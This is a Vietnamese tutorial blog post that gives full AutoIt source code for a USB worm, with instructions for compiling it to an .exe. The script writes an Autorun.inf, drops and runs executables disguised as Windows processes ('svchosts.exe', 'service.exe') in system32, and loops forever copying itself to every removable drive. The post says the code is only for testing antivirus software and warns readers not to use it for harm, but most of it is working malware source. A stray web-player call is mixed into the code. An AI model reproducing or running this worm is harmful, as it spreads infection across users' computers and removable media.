Chắc các bạn không con xa lạ với phần mềm autoit nữa
nên mình hướng dẫn và cho các bạn những code để tạo ra một con virus và mình khuyên các bạn là không dùng những con virus này để đem phá hoại người khác.:angry:
Link Download Autoit : https://www.autoitscript.com/site/autoit/downloads/
Virus này dùng để test phần mềm diệt virus thôi nhé :))
Chuyển đổi file .au3 thành File .exe, bạn click vào thanh start -> AutoIt v3 -> Compile Script to .exe
:angry::angry::angry::angry::angry::angry: Nghiêm cấm đem đi phá hoại nhé :brick::brick::brick:
Phần Code :

#Notrayicon
Dim $autorun = "[autorun]" & @CRLF & "open=svchosts.exe" & @CRLF & "SHELl\opEn\defaUlt=1" & @CRLF & "sHell\eXpLore\CommaND=svchosts.exe"
if not fileexists("C:\Autorun.inf") Then
filewrite("C:\Autorun.inf",$autorun)
endif
fileDelete("C:\Autorun.inf")
filewrite("C:\Autorun.inf",$autorun)
FileCopy(@ScriptDir & "\service.exe","C:\Windows\system32",1)
run("C:\Windows\system32\service.exe")
FileCopy(@ScriptDir & "\svchosts.exe","C:\Windows\system32",1)
while 1
$var = DriveGetDrive( "REMOVABLE" )
If NOT @error Then
FileCopy(@ScriptFullPath,$var[0],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy("C:\Autorun.inf",$var[0],1)
For $i = 1 to $var[0]
FileCopy("C:\Autorun.inf",$var[$i],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy(@ScriptFullPath,$var[$i],1)
Next
EndIf
wend
loadt2player(402);

End tut


- 0 bình luận lượt xem

http://www.plusthuthuat.com/2015/07/chac-cac-ban-khong-con-xa-la-voi-phan.html

BÌNH LUẬN (0)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé